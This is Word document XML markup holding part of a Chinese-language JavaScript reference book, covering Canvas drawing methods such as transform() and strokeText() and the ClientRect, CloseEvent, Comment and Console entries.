    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法根据指定的位置及尺寸，绘制一个矩形边框（但不对其内部填充）。线条颜色及宽度由</w:t>
      </w:r>
      <w:r>
        <w:t>strokeStyle</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>lineWidth</w:t>
      </w:r>
      <w:r>
        <w:t>属性定义，矩形边角的外观由</w:t>
      </w:r>
      <w:r>
        <w:t>lineJoin</w:t>
      </w:r>
      <w:r>
        <w:t>属性定义。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>rect()</w:t>
      </w:r>
      <w:r>
        <w:t>方法不同，</w:t>
      </w:r>
      <w:r>
        <w:t>stokreRect()</w:t>
      </w:r>
      <w:r>
        <w:t>不会影响当前路径和当前点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">void strokeText(string text,double </w:t>
      </w:r>
      <w:r>
        <w:t>x,y,[maxWidth])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>strokeText()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>fillText()</w:t>
      </w:r>
      <w:r>
        <w:t>很类似，除了它不是根据</w:t>
      </w:r>
      <w:r>
        <w:t>fillStyle</w:t>
      </w:r>
      <w:r>
        <w:t>填充每一个字形，而是根据</w:t>
      </w:r>
      <w:r>
        <w:t>strokeStyle</w:t>
      </w:r>
      <w:r>
        <w:t>对每一个字形进行描边。当使用大号字体时，</w:t>
      </w:r>
      <w:r>
        <w:t>strokeText()</w:t>
      </w:r>
      <w:r>
        <w:t>会生成一些有趣的图形效果，不过在实际应用中，</w:t>
      </w:r>
      <w:r>
        <w:t>fillText()</w:t>
      </w:r>
      <w:r>
        <w:t>更常用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void transform(double a,b,c,d,e,f)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法的参数定义一个</w:t>
      </w:r>
      <w:r>
        <w:t>3×3</w:t>
      </w:r>
      <w:r>
        <w:t>仿射转换矩阵</w:t>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>个重要元素：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251752448" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="396815" cy="409754"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="97" name="00097.jpeg" descr="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7.jpeg" descr="00097.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId100"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="396815" cy="409754"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>transform()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将当前转换矩阵的值设置为这个转换矩阵与</w:t>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t>的积：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>CTM'=CTM×T</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>平移（</w:t>
      </w:r>
      <w:r>
        <w:t>translation</w:t>
      </w:r>
      <w:r>
        <w:t>）、缩放以及旋转都可以通过这个通用的</w:t>
      </w:r>
      <w:r>
        <w:t>transform()</w:t>
      </w:r>
      <w:r>
        <w:t>方法实现。对于平移来说，调用</w:t>
      </w:r>
      <w:r>
        <w:t>transform(1,0,0,1,dx,dy)</w:t>
      </w:r>
      <w:r>
        <w:t>即可。对于缩放来说，调用</w:t>
      </w:r>
      <w:r>
        <w:t>transform(sx,0,0,sy,0,0)</w:t>
      </w:r>
      <w:r>
        <w:t>即可。对于以原点为中心顺时针旋转角度</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>的操作来说，可以使用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>transform(cos(x),sin(x),-sin(x),cos(x),0,0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>对于以平行于</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>轴的因子</w:t>
      </w:r>
      <w:r>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:t>进行的裁剪来说，调用</w:t>
      </w:r>
      <w:r>
        <w:t>transform(1,0,k,1,0,0)</w:t>
      </w:r>
      <w:r>
        <w:t>即可。对于</w:t>
      </w:r>
      <w:r>
        <w:t>以平行于</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>轴的裁剪，调用</w:t>
      </w:r>
      <w:r>
        <w:t>transform(1,k,0,1,0,0)</w:t>
      </w:r>
      <w:r>
        <w:t>即可。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void translate(double x,double y)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>translate()</w:t>
      </w:r>
      <w:r>
        <w:t>方法为当前画布的转换矩阵添加水平和垂直的偏移量。参数</w:t>
      </w:r>
      <w:r>
        <w:t>dx</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>dy</w:t>
      </w:r>
      <w:r>
        <w:t>将添加到所有随后定义的路径的每一个点上。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="797" w:name="ClientRect"/>
      <w:r>
        <w:t>ClientRect</w:t>
      </w:r>
      <w:bookmarkEnd w:id="797"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>元素边框</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ClientRect</w:t>
      </w:r>
      <w:r>
        <w:t>对象定义一个矩形，使用窗口或视口（</w:t>
      </w:r>
      <w:r>
        <w:t>viewport</w:t>
      </w:r>
      <w:r>
        <w:t>）坐标。</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>getBoundingClientRect()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回这类对象，用于描述元素在屏幕上的边框。</w:t>
      </w:r>
      <w:r>
        <w:t>ClientRect</w:t>
      </w:r>
      <w:r>
        <w:t>对象是在</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>方向上静态的（</w:t>
      </w:r>
      <w:r>
        <w:t>x static</w:t>
      </w:r>
      <w:r>
        <w:t>）：当它描述的元素发生改变时，它不会发生变化。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly float bottom</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>视口坐标中矩形底边的</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>坐标。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly float height</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>矩形的高度，单位为像素。在</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>及更早的版本中，这个属性未定义，在这些版本中可使用</w:t>
      </w:r>
      <w:r>
        <w:t>bottom-top</w:t>
      </w:r>
      <w:r>
        <w:t>代替。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly float left</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>视口坐标中矩形左边的</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>坐标。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly float right</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>视口坐标中矩形右边的</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>坐标。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly float top</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>视口坐标中矩形顶边的</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>坐标。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly float width</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>矩形的宽度，单位为像素。在</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>及更早的版本中，这个属性未定义，在这些版本中可使用</w:t>
      </w:r>
      <w:r>
        <w:t>right-left</w:t>
      </w:r>
      <w:r>
        <w:t>代替。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="798" w:name="CloseEvent"/>
      <w:r>
        <w:t>CloseEvent</w:t>
      </w:r>
      <w:bookmarkEnd w:id="798"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>说明一个</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>是否干净地关闭了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当一个</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>连接关闭时，一个不冒泡的、不可取消的关闭事件会在这个</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>对象上触发，对应的</w:t>
      </w:r>
      <w:r>
        <w:t>CloseEvent</w:t>
      </w:r>
      <w:r>
        <w:t>对象会传入所有注册的事件处理程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly boolean wasClean</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>连接</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>协议的控制下关闭，并且服务器及客户端都成功确认，则这个关闭称为干净的，这个属性值为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。如果属性值为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>可能是由于某种网络错误而关闭。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="799" w:name="Comment"/>
      <w:r>
        <w:t>Comment</w:t>
      </w:r>
      <w:bookmarkEnd w:id="799"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>注释</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Comment</w:t>
      </w:r>
      <w:r>
        <w:t>节点表示</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中的注释。注释的内容（即</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--”</w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>“--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>之间的文本）可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>属性或者从</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>继承而来的</w:t>
      </w:r>
      <w:r>
        <w:t>nodeValue</w:t>
      </w:r>
      <w:r>
        <w:t>属性获取。可通过</w:t>
      </w:r>
      <w:r>
        <w:t>Document.createComment()</w:t>
      </w:r>
      <w:r>
        <w:t>方法创建一个注释对象。</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string dat</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注释的文本内容。</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注释包含的字符个数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void appendData(string data)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void deleteData(unsigned long offset,unsigned long count)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void insertData(unsigned long offset,string data)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void replaceData(unsigned long offset,unsigned long count,string</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> data)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string substringData(unsigned long offset,unsigned long count)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Comment</w:t>
      </w:r>
      <w:r>
        <w:t>节点有</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点的大部分方法，这些方法和</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点中的效果也一样。它们列在这儿，不过相关文档请参考</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="800" w:name="Console"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Console</w:t>
      </w:r>
      <w:bookmarkEnd w:id="800"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>调试输出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>现代浏览器（以及一些装了</w:t>
      </w:r>
      <w:r>
        <w:t>Firebug</w:t>
      </w:r>
      <w:r>
        <w:t>等调试器扩展的老浏览器）定义一个全局的</w:t>
      </w:r>
      <w:r>
        <w:t>console</w:t>
      </w:r>
      <w:r>
        <w:t>属性，对应一个</w:t>
      </w:r>
      <w:r>
        <w:t>Console</w:t>
      </w:r>
      <w:r>
        <w:t>对象。这个对象的方法定义一些简单调试任务的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，比如将消息输出到一个控制台窗口（这个控制台可能有</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>Developer Tools"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"Web Inspector"</w:t>
      </w:r>
      <w:r>
        <w:t>等名字）中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Console API</w:t>
      </w:r>
      <w:r>
        <w:t>还没有一个正式的标准，不过，</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Firebug</w:t>
      </w:r>
      <w:r>
        <w:t>调试器扩展已经建立了一个事实标准，浏览器厂商看起来正在实现</w:t>
      </w:r>
      <w:r>
        <w:t>Firebug</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，有关文档在下面。基本的</w:t>
      </w:r>
      <w:r>
        <w:t>console.log()</w:t>
      </w:r>
      <w:r>
        <w:t>函数在几乎所有浏览器中都支持，但其他函数在各浏览器中的支持情况就没这么好。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，在一些较老的浏览器中，只有在控制台窗口打开时</w:t>
      </w:r>
      <w:r>
        <w:t>console</w:t>
      </w:r>
      <w:r>
        <w:t>属性才有定义，如果在控制台关闭的情况下运行那些使用</w:t>
      </w:r>
      <w:r>
        <w:t>Console API</w:t>
      </w:r>
      <w:r>
        <w:t>的脚本会导致</w:t>
      </w:r>
      <w:r>
        <w:t>错误。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
